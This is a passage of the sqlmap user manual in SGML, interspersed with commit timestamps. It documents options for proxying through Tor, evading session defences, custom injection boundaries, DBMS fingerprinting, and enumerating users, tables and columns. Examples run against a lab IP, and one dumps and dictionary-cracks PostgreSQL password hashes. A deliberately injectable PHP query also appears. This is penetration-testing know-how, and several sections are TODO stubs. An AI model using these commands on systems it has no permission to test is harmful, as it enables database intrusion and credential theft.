It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S)
requests to the target URL. The syntax of HTTP(S) proxy value is
<tt>http://url:port</tt>.
2010-03-03 16:59:29 +03:00
<p>
2011-02-27 15:19:32 +03:00
If the HTTP(S) proxy requires authentication, you can provide the
credentials in the format <tt>username:password</tt> to the
<tt>-</tt><tt>-proxy-cred</tt> switch.
2010-03-03 16:59:29 +03:00
2011-02-20 00:08:18 +03:00
<p>
If, for any reason, you need to stay anonymous, instead of passing by a
2011-02-27 15:19:32 +03:00
single predefined HTTP(S) proxy server, you can configure a <htmlurl
2011-02-20 00:08:18 +03:00
url="http://www.torproject.org/" name="Tor client"> together with
2011-02-27 15:19:32 +03:00
<htmlurl url="http://www.privoxy.org" name="Privoxy"> (or similar) on
your machine as explained on the Tor client guide and use the Privoxy
daemon, by default listening on <tt>127.0.0.1:8118</tt>, as the sqlmap
proxy.
2010-03-02 15:07:54 +03:00
2011-02-20 00:08:18 +03:00
<p>
The switch <tt>-</tt><tt>-ignore-proxy</tt> should be used when you want
2011-02-27 15:19:32 +03:00
to run sqlmap against a target part of a local area network by ignoring
the system-wide set HTTP(S) proxy server setting.
2010-03-02 15:07:54 +03:00
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Delay between each HTTP request
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-delay</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to specify a number of seconds to hold between each HTTP(S)
2011-02-20 00:08:18 +03:00
request. The valid value is a float, for instance <tt>0.5</tt> means half
a second.
By default, no delay is set.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect2>Seconds to wait before timeout connection
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-timeout</tt>
<p>
It is possible to specify a number of seconds to wait before considering
the HTTP(S) request timed out. The valid value is a float, for instance
10.5 means ten seconds and a half.
2011-02-27 15:19:32 +03:00
By default <bf>30 seconds</bf> are set.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect2>Maximum number of retries when the HTTP connection timeouts
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-retries</tt>
2008-10-15 19:38:22 +04:00
2010-03-03 19:25:03 +03:00
<p>
2011-02-20 00:08:18 +03:00
It is possible to specify the maximum number of retries when the HTTP(S)
2011-02-27 15:19:32 +03:00
connection timeouts. By default it retries up to <bf>three times</bf>.
2010-03-03 19:25:03 +03:00
2011-02-20 00:08:18 +03:00
<sect2>Filtering targets from provided proxy log using regular expression
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-scope</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Rather than using all hosts parsed from provided logs with switch
<tt>-l</tt>, you can specify valid Python regular expression to be used
for filtering desired ones.
2008-10-15 19:38:22 +04:00
2011-02-28 19:14:09 +03:00
Example of valid syntax:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-20 00:08:18 +03:00
$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
</verb></tscreen>
2008-10-15 19:38:22 +04:00
2008-12-12 22:06:31 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Avoid your session to be destroyed after too many unsuccessful requests
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-safe-url</tt> and <tt>-</tt><tt>-safe-freq</tt>
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
Sometimes web applications or inspection technology in between destroys
the session if a certain number of unsuccessful requests is performed.
This might occur during the detection phase of sqlmap or when it exploits
any of the blind SQL injection types. Reason why is that the SQL payload
does not necessarily returns output and might therefore raise a signal to
either the application session management or the inspection technology.
<p>
To bypass this limitation set by the target, you can provide two switches:
<itemize>
<item><tt>-</tt><tt>-safe-url</tt>: Url address to visit frequently during
testing.
<item><tt>-</tt><tt>-safe-freq</tt>: Test requests between two visits to a
given safe url.
</itemize>
<p>
This way, sqlmap will visit every a predefined number of requests a
certain <em>safe</em> URL without performing any kind of injection against
it.
2008-10-15 19:38:22 +04:00
2011-02-20 00:08:18 +03:00
<sect1>Optimization
2008-11-09 19:57:47 +03:00
<p>
2011-02-27 15:19:32 +03:00
These switches can be used to optimize the performance of sqlmap.
2011-02-20 00:08:18 +03:00
<sect2>Bundle optimization
2008-11-09 19:57:47 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-o</tt>
2008-11-09 19:57:47 +03:00
2011-02-20 00:08:18 +03:00
<p>
2011-02-28 18:23:05 +03:00
This switch is an alias that implicitly sets the following switches:
2011-02-27 15:19:32 +03:00
<itemize>
<item><tt>-</tt><tt>-keep-alive</tt>
<item><tt>-</tt><tt>-null-connection</tt>
<item><tt>-</tt><tt>-threads 4</tt>
<item><tt>-</tt><tt>-group-concat</tt>
</itemize>
<p>
2011-02-28 18:23:05 +03:00
Read below for details about each switch.
2008-11-09 19:57:47 +03:00
2011-02-20 00:08:18 +03:00
<sect2>Output prediction
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-predict-output</tt>
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
TODO
2008-11-15 15:25:19 +03:00
2011-02-20 00:08:18 +03:00
<sect2>HTTP Keep-Alive
2009-04-22 15:48:07 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-keep-alive</tt>
2009-04-22 15:48:07 +04:00
<p>
2011-02-20 00:08:18 +03:00
TODO
2009-04-22 15:48:07 +04:00
2011-02-20 00:08:18 +03:00
<sect2>HTTP NULL connection
2010-03-02 15:07:54 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-null-connection</tt>
2010-03-05 17:06:03 +03:00
<p>
2011-02-20 00:08:18 +03:00
TODO
2010-03-05 17:06:03 +03:00
2011-02-20 00:08:18 +03:00
<sect2>Concurrent HTTP(S) requests
2010-03-02 15:07:54 +03:00
2011-02-20 00:08:18 +03:00
<p>
Switch: <tt>-</tt><tt>-threads</tt>
2010-03-02 15:07:54 +03:00
2011-02-20 00:08:18 +03:00
<p>
It is possible to specify the maximum number of concurrent HTTP(S)
requests that sqlmap is allowed to do.
This feature relies on the <htmlurl url="http://en.wikipedia.org/wiki/Multithreading"
name="multi-threading"> concept and inherits both its pro and its cons.
2008-11-15 15:25:19 +03:00
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
This features applies to the brute-force switches and when the data
fetching is done through any of the blind SQL injection techniques.
2011-02-20 00:08:18 +03:00
For the latter case, sqlmap first calculates the length of the query
2011-02-27 15:19:32 +03:00
output in a single thread, then starts the multi-threading. Each thread is
assigned to retrieve one character of the query output. The thread ends
when that character is retrieved - it takes up to 7 HTTP(S) requests with
the bisection algorithm implemented in sqlmap.
2008-12-12 22:06:31 +03:00
2011-02-20 00:08:18 +03:00
<p>
Note that the multi-threading switch does not affect any other SQL
2011-02-27 15:19:32 +03:00
injection technique. The maximum number of concurrent requests is set to
<bf>10</bf> for performance and site reliability reasons.
2010-03-05 17:06:03 +03:00
2011-02-20 00:08:18 +03:00
<sect2>MySQL GROUP_CONCAT() speed up
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-group-concat</tt>
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
TODO
2008-11-15 15:25:19 +03:00
2011-02-20 00:08:18 +03:00
<sect1>Injection
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
These options can be used to specify which parameters to test for, provide
custom injection payloads and optional tampering scripts.
2008-11-15 15:25:19 +03:00
2011-02-20 00:08:18 +03:00
<sect2>Testable parameter(s)
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-p</tt>
2008-11-15 15:25:19 +03:00
<p>
2011-02-20 00:08:18 +03:00
By default sqlmap tests all <tt>GET</tt> parameters and <tt>POST</tt>
2011-02-27 15:19:32 +03:00
parameters. When the value of <tt>-</tt><tt>-level</tt> is >= <bf>2</bf>
it tests also HTTP <tt>Cookie</tt> header values. When this value is >=
<bf>3</bf> it tests also HTTP <tt>User-Agent</tt> and HTTP <tt>Referer</tt>
header value for SQL injections.
2011-02-20 00:08:18 +03:00
It is however possible to manually specify a comma-separated list of
parameter(s) that you want sqlmap to test. This will bypass the dependence
2011-02-27 15:19:32 +03:00
on the value of <tt>-</tt><tt>-level</tt> too.
2008-11-15 15:25:19 +03:00
2011-02-20 00:08:18 +03:00
<p>
For instance, to test for GET parameter <tt>id</tt> and for HTTP
<tt>User-Agent</tt> only, provide <tt>-p id,user-agent</tt>.
2008-11-15 15:25:19 +03:00
2008-10-15 19:38:22 +04:00
2008-12-09 00:24:24 +03:00
<sect2>Force the database management system name
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-dbms</tt>
2008-12-09 00:24:24 +03:00
<p>
By default sqlmap automatically detects the web application's back-end
2010-02-08 12:10:32 +03:00
database management system.
2011-02-20 00:08:18 +03:00
As of version <bf>0.9</bf>, sqlmap fully supports the following database
management systems:
2008-12-09 00:24:24 +03:00
<itemize>
<item>MySQL
<item>Oracle
<item>PostgreSQL
<item>Microsoft SQL Server
2011-02-20 00:08:18 +03:00
<item>Microsoft Access
<item>SQLite
<item>Firebird
<item>Sybase
<item>SAP MaxDB
2008-12-09 00:24:24 +03:00
</itemize>
<p>
2011-02-20 00:08:18 +03:00
If for any reason sqlmap fails to detect the back-end DBMS once a SQL
injection has been identified or if you want to avoid an active fingeprint,
you can provide the name of the back-end DBMS yourself (e.g. <tt>postgresql</tt>).
For MySQL and Microsoft SQL Server provide them respectively in the form
<tt>MySQL <version></tt> and <tt>Microsoft SQL Server <version>
</tt>, where <tt><version></tt> is a valid version for the DBMS; for
instance <tt>5.0</tt> for MySQL and <tt>2005</tt> for Microsoft SQL Server.
2008-12-09 00:24:24 +03:00
<p>
2011-02-20 00:08:18 +03:00
In case you provide <tt>-</tt><tt>-fingerprint</tt> together with
<tt>-</tt><tt>-dbms</tt>, sqlmap will only perform the extensive
fingerprint for the specified database management system only, read below
for further details.
2008-12-09 00:24:24 +03:00
<p>
Note that this option is <bf>not</bf> mandatory and it is strongly
recommended to use it <bf>only if you are absolutely sure</bf> about the
back-end database management system. If you do not know it, let sqlmap
2011-02-20 00:08:18 +03:00
automatically fingerprint it for you.
2008-12-09 00:24:24 +03:00
2009-04-22 15:48:07 +04:00
<sect2>Force the database management system operating system name
<p>
2011-02-20 00:08:18 +03:00
Switch: <tt>-</tt><tt>-os</tt>
2009-04-22 15:48:07 +04:00
<p>
By default sqlmap automatically detects the web application's back-end
2011-02-20 00:08:18 +03:00
database management system underlying operating system when this
information is a dependence of any other provided switch.
2009-04-22 15:48:07 +04:00
At the moment the fully supported operating systems are two:
<itemize>
<item>Linux
<item>Windows
</itemize>
<p>
2011-02-20 00:08:18 +03:00
It is possible to force the operating system name if you already know it
so that sqlmap will avoid doing it itself.
2009-04-22 15:48:07 +04:00
<p>
Note that this option is <bf>not</bf> mandatory and it is strongly
recommended to use it <bf>only if you are absolutely sure</bf> about the
back-end database management system underlying operating system. If you do
not know it, let sqlmap automatically identify it for you.
2008-12-09 00:24:24 +03:00
<sect2>Custom injection payload
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-prefix</tt> and <tt>-</tt><tt>-suffix</tt>
2008-12-09 00:24:24 +03:00
<p>
2008-12-12 22:06:31 +03:00
In some circumstances the vulnerable parameter is exploitable only if the
2011-02-20 00:08:18 +03:00
user provides a specific suffix to be appended to the injection payload.
2008-12-12 22:06:31 +03:00
Another scenario where these options come handy presents itself when the
user already knows that query syntax and want to detect and exploit the
2011-02-20 00:08:18 +03:00
SQL injection by directly providing a injection payload prefix and suffix.
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
Example of vulnerable source code:
2008-12-12 22:06:31 +03:00
<tscreen><verb>
2011-02-20 00:08:18 +03:00
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
2008-12-12 22:06:31 +03:00
</verb></tscreen>
<p>
2011-02-20 00:08:18 +03:00
To detect and exploit this SQL injection, you can either let sqlmap detect
the <bf>boundaries</bf> (as in combination of SQL payload prefix and
suffix) for you during the detection phase, or provide them on your own.
For example:
2008-12-12 22:06:31 +03:00
<tscreen><verb>
2011-02-20 00:08:18 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
-p id --prefix "')" --suffix "AND ('abc'='abc"
[...]
2008-12-12 22:06:31 +03:00
</verb></tscreen>
2011-02-20 00:08:18 +03:00
<p>
This will result in all sqlmap requests to end up in a query as follows:
2008-12-12 22:06:31 +03:00
<tscreen><verb>
2011-02-20 00:08:18 +03:00
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
2008-12-12 22:06:31 +03:00
</verb></tscreen>
2011-02-20 00:08:18 +03:00
<p>
Which makes the query syntactically correct.
2008-12-12 22:06:31 +03:00
<p>
2008-12-17 23:58:19 +03:00
In this simple example, sqlmap could detect the SQL injection and exploit
2011-02-20 00:08:18 +03:00
it without need to provide custom boundaries, but sometimes in real world
application it is necessary to provide it when the injection point is
within nested <tt>JOIN</tt> queries for instance.
<sect2>Tamper injection data
<p>
Switch: <tt>-</tt><tt>-tamper</tt>
<p>
TODO
<sect1>Detection
<p>
These options can be used to specify how to parse and compare page content
from HTTP responses when using blind SQL injection technique.
<sect2>Level
<p>
Switch: <tt>-</tt><tt>-level</tt>
<p>
TODO
<sect2>Risk
<p>
Switch: <tt>-</tt><tt>-risk</tt>
<p>
TODO
2008-12-09 00:24:24 +03:00
2011-02-27 15:19:32 +03:00
<sect2>TODO: Page comparison
2008-10-15 19:38:22 +04:00
<p>
2011-02-20 00:08:18 +03:00
Switches: <tt>-</tt><tt>-string</tt> and <tt>-</tt><tt>-regexp</tt>
2008-10-15 19:38:22 +04:00
<p>
By default the distinction of a True query by a False one (basic concept
2009-01-20 02:45:54 +03:00
for Inferential blind SQL injection attacks) is done comparing injected
2008-12-12 22:06:31 +03:00
requests page content MD5 hash with the original not injected page content
MD5 hash.
Not always this concept works because sometimes the page content changes at
each refresh even not injecting anything, for instance when the page has a
counter, a dynamic advertisment banner or any other part of the HTML which
is render dynamically and might change in time not only consequently to
user's input.
2008-10-15 19:38:22 +04:00
To bypass this limit, sqlmap makes it possible to manually provide a
2008-12-12 22:06:31 +03:00
string which is <bf>always</bf> present on the not injected page
2008-10-15 19:38:22 +04:00
<bf>and</bf> on all True injected query pages, but that it is <bf>not</bf>
2008-12-12 22:06:31 +03:00
on the False ones. This can also be achieved by providing a regular
expression.
2008-10-15 19:38:22 +04:00
Such information is easy for an user to retrieve, simply try to inject on
2008-12-12 22:06:31 +03:00
the affected URL parameter an invalid value and compare original (not
injected) page content with the injected wrong page content to identify
which string or regular expression match is on not injected and True page
only.
This way the distinction will be based upon string presence or regular
expression match and not page MD5 hash comparison.
2008-10-15 19:38:22 +04:00
<p>
As you can see, the string after <tt>Dynamic content</tt> changes its
value every second. In the example it is just a call to PHP
<tt>time()</tt> function, but on the real world it is usually much more
than that.
<p>
Looking at the HTTP responses page content you can see that the first five
lines of code do not change at all.
So choosing for instance the word <tt>luther</tt> as an output that is
2008-12-12 22:06:31 +03:00
on the not injected page content and it is not on the False page content
(because the query condition returns no output so <tt>luther</tt> is not
displayed on the page content) and passing it to sqlmap, you are able to
inject anyway.
2008-10-15 19:38:22 +04:00
<p>
2008-12-12 22:06:31 +03:00
You can also specify a regular expression to match rather than a string if
you prefer.
<p>
As you can see, when one of these options is specified, sqlmap skips the
URL stability test.
<p>
2010-02-08 12:10:32 +03:00
<bf>Consider one of these options a MUST when dealing with a page
with content that changes itself at each refresh without modifying the
2008-12-12 22:06:31 +03:00
user's input</bf>.
2008-12-04 20:40:03 +03:00
<sect1>Techniques
2010-03-03 21:58:27 +03:00
<p>
2011-02-27 15:19:32 +03:00
These options can be used to tweak how specific SQL injection techniques
are tested.
2010-03-03 21:58:27 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Seconds to delay the DBMS response for time-based blind SQL injection
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-time-sec</tt>
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to set the seconds to delay the response when testing for
time-based blind SQL injection, by providing the
<tt>-</tt><tt>-time-sec</tt> option followed by an integer.
By default delay is set to <bf>5 seconds</bf>.
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<p>
Switch: <tt>-</tt><tt>-union-cols</tt>
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<p>
TODO
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect2>TODO
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-union-char</tt>
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
TODO
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect1>Fingerprint
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect2>TODO: Extensive database management system fingerprint
2008-12-17 02:52:16 +03:00
2008-12-17 23:17:34 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-f</tt> or <tt>-</tt><tt>-fingerprint</tt>
2008-12-17 23:17:34 +03:00
2011-02-27 15:19:32 +03:00
<p>
By default the web application's back-end database management system
fingerprint is performed requesting a database specific function which
returns a known static value. By comparing these value with the returned
value it is possible to identify if the back-end database is effectively
the one that sqlmap expected. Depending on the DBMS being tested, a
SQL dialect syntax which is syntatically correct depending upon the
back-end DBMS is also tested.
2008-12-17 23:17:34 +03:00
2011-02-27 15:19:32 +03:00
After identifying an injectable vector, sqlmap fingerprints the back-end
database management system and go ahead with the injection with its
specific syntax within the limits of the database architecture.
2008-12-17 23:17:34 +03:00
2011-02-27 15:19:32 +03:00
<p>
As you can see, sqlmap automatically fingerprints the web server operating
system and the web application technology by parsing some HTTP response headers.
2008-12-17 23:17:34 +03:00
2011-02-27 15:19:32 +03:00
<p>
If you want to perform an extensive database management system fingerprint
based on various techniques like specific SQL dialects and inband error
messages, you can provide the <tt>-</tt><tt>-fingerprint</tt> option.
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<p>
As you can see from the last example, sqlmap first tested for MySQL,
then for Oracle, then for PostgreSQL since the user did not forced the
back-end database management system name with option <tt>-</tt><tt>-dbms</tt>.
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
If you want an even more accurate result, based also on banner parsing,
you can also provide the <tt>-b</tt> or <tt>-</tt><tt>-banner</tt> option.
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
As you can see, sqlmap was also able to fingerprint the back-end DBMS
operating system by parsing the DBMS banner value.
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
correctly identify the database management system patch level.
The Microsoft SQL Server XML versions file is the result of a sqlmap
parsing library that fetches data from Chip Andrews'
<htmlurl url="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
name="SQLSecurity.com site"> and outputs it to the XML versions file.
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect1>Enumeration
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<p>
These options can be used to enumerate the back-end database management
system information, structure and data contained in the tables. Moreover
you can run your own SQL statements.
<sect2>Banner
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-b</tt> or <tt>-</tt><tt>-banner</tt>
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<p>
Most of the modern database management systems have a function and/or
an environment variable which returns the database management system
version and eventually details on its patch level, the underlying
system. Usually the function is <tt>version()</tt> and the environment
variable is <tt>@@version</tt>, but this vary depending on the target
DBMS.
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Session user
2008-12-04 20:40:03 +03:00
2008-12-17 23:17:34 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-current-user</tt>
2008-12-17 23:17:34 +03:00
2011-02-27 15:19:32 +03:00
<p>
On the majority of modern DBMSes is possible to retrieve the database
management system's user which is effectively performing the query against
the back-end DBMS from the web application.
2008-12-17 23:17:34 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Current database
<p>
Switch: <tt>-</tt><tt>-current-db</tt>
2008-12-17 23:17:34 +03:00
2009-04-22 15:48:07 +04:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to retrieve the database management system's database name
that the web application is connected to.
2009-04-22 15:48:07 +04:00
2008-12-04 20:40:03 +03:00
2011-02-27 15:19:32 +03:00
<sect2>Detect whether or not the session user is a database administrator
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-is-dba</tt>
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
It is possible to detect if the current database management system session
user is a database administrator, also known as DBA.
sqlmap will return <tt>True</tt> if it is, viceversa <tt>False</tt>.
<sect2>List database management system users
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switch: <tt>-</tt><tt>-users</tt>
2008-12-04 20:40:03 +03:00
2011-02-27 15:19:32 +03:00
<p>
When the session user has read access to the system table containing
information about the DBMS users, it is possible to enumerate the list of
users.
2008-12-04 20:40:03 +03:00
2011-02-27 15:19:32 +03:00
<sect2>List and crack database management system users password hashes
2008-12-04 20:40:03 +03:00
2009-01-20 02:45:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-passwords</tt> and <tt>-U</tt>
2009-01-20 02:45:54 +03:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to the system table containing
information about the DBMS users' passwords, it is possible to enumerate
the password hashes for each database management system user.
sqlmap will first enumerate the users, then the different password hashes
for each of them.
2009-01-20 02:45:54 +03:00
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
Example against a PostgreSQL target:
2008-12-04 20:40:03 +03:00
<tscreen><verb>
2011-02-27 15:19:32 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
2008-12-04 20:40:03 +03:00
[...]
2008-12-12 22:06:31 +03:00
back-end DBMS: PostgreSQL
2011-02-27 15:19:32 +03:00
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/tmp/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/tmp/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
password hash: md5d7d880f96044b72d0bba108ace96d1e4
clear-text password: testpass
[*] testuser [1]:
password hash: md599e5ea7a6f7c3269995cba3927fd0093
clear-text password: testpass
2008-12-04 20:40:03 +03:00
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
Not only sqlmap enumerated the DBMS users and their passwords, but it also
recognized the hash format to be PostgreSQL, asked the user whether or not
to test the hashes against a dictionary file and identified the clear-text
password for the <tt>postgres</tt> user, which is usually a DBA along the
other user, <tt>testuser</tt>, password.
<p>
This feature has been implemented for all DBMS where it is possible to
enumerate users' password hashes, including Oracle and Microsoft SQL
Server pre and post 2005.
2008-12-12 22:06:31 +03:00
2009-01-04 01:59:22 +03:00
<p>
2011-02-27 15:19:32 +03:00
You can also provide the <tt>-U</tt> option to specify the specific user
who you want to enumerate and eventually crack the password hash(es).
If you provide <tt>CU</tt> as username it will consider it as an alias for
current user and will retrieve the password hash(es) for this user.
2009-01-04 01:59:22 +03:00
2008-12-04 20:40:03 +03:00
2011-02-27 15:19:32 +03:00
<sect2>List database management system users privileges
<p>
Switches: <tt>-</tt><tt>-privileges</tt> and <tt>-U</tt>
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to the system table containing
information about the DBMS users, it is possible to enumerate the
privileges for each database management system user.
By the privileges, sqlmap will also show you which are database
administrators.
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
You can also provide the <tt>-U</tt> option to specify the user who you
want to enumerate the privileges.
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
If you provide <tt>CU</tt> as username it will consider it as an alias for
current user and will enumerate the privileges for this user.
2008-12-04 20:40:03 +03:00
2011-02-27 15:19:32 +03:00
<sect2>List database management system users roles
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-roles</tt> and <tt>-U</tt>
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to the system table containing
information about the DBMS users, it is possible to enumerate the
roles for each database management system user.
2008-12-04 20:40:03 +03:00
<p>
2011-02-27 15:19:32 +03:00
You can also provide the <tt>-U</tt> option to specify the user who you
want to enumerate the privileges.
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
If you provide <tt>CU</tt> as username it will consider it as an alias for
current user and will enumerate the privileges for this user.
2008-12-04 20:40:03 +03:00
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
This feature is only available when the DBMS is Oracle.
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<sect2>List database management system's databases
2008-12-17 02:52:16 +03:00
2011-02-27 15:19:32 +03:00
<p>
Switch: <tt>-</tt><tt>-dbs</tt>
2008-12-17 02:52:16 +03:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to the system table containing
information about available databases, it is possible to enumerate the
list of databases.
2008-12-12 22:06:31 +03:00
2011-02-27 15:19:32 +03:00
<p>
Note that this feature is not available if the database management system
is Oracle.
2008-12-04 20:40:03 +03:00
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Enumerate database's tables
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-tables</tt> and <tt>-D</tt>
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to the system table containing
information about databases' tables, it is possible to enumerate
the list of tables for a specific database management system's databases.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<p>
If you do not provide a specific database with switch <tt>-D</tt>, sqlmap
will enumerate the tables for all DBMS databases.
2008-10-15 19:38:22 +04:00
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
Note that on Oracle you have to provide the <tt>TABLESPACE_NAME</tt>
instead of the database name.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Enumerate database table columns
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
Switches: <tt>-</tt><tt>-columns</tt>, <tt>-C</tt>, <tt>-T</tt> and <tt>-D</tt>
2008-12-12 22:06:31 +03:00
<p>
2011-02-27 15:19:32 +03:00
When the session user has read access to the system table containing
information about database's tables, it is possible to enumerate the list
of columns for a specific database table.
sqlmap also enumerates the data-type for each column.
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
This feature depends on the option <tt>-T</tt> to specify the table name
and optionally on <tt>-D</tt> to specify the database name. When the
database name is not specified, the current database name is used.
You can also provide the <tt>-C</tt> option to specify the table columns
name like the one you provided to be enumerated.
2008-10-15 19:38:22 +04:00
<p>
2011-02-28 19:14:09 +03:00
Example against a SQLite target:
2008-10-15 19:38:22 +04:00
<tscreen><verb>
2011-02-28 19:14:09 +03:00
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
2011-02-27 15:19:32 +03:00
-T users -C name
2008-10-15 19:38:22 +04:00
[...]
2011-02-28 19:14:09 +03:00
Database: SQLite_masterdb
2011-02-27 15:19:32 +03:00
Table: users
2011-02-28 19:14:09 +03:00
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| id | INTEGER |
| name | TEXT |
| surname | TEXT |
+---------+---------+
2008-10-15 19:38:22 +04:00
</verb></tscreen>
<p>
2011-02-27 15:19:32 +03:00
Note that on PostgreSQL you have to provide <tt>public</tt> or the
name of a system database. That's because it is not possible to enumerate
other databases tables, only the tables under the schema that the web
application's user is connected to, which is always aliased by
<tt>public</tt>.
2008-10-15 19:38:22 +04:00
2011-02-27 15:19:32 +03:00
<sect2>Dump database table entries
2008-10-15 19:38:22 +04:00
<p>
2011-02-27 15:19:32 +03:00
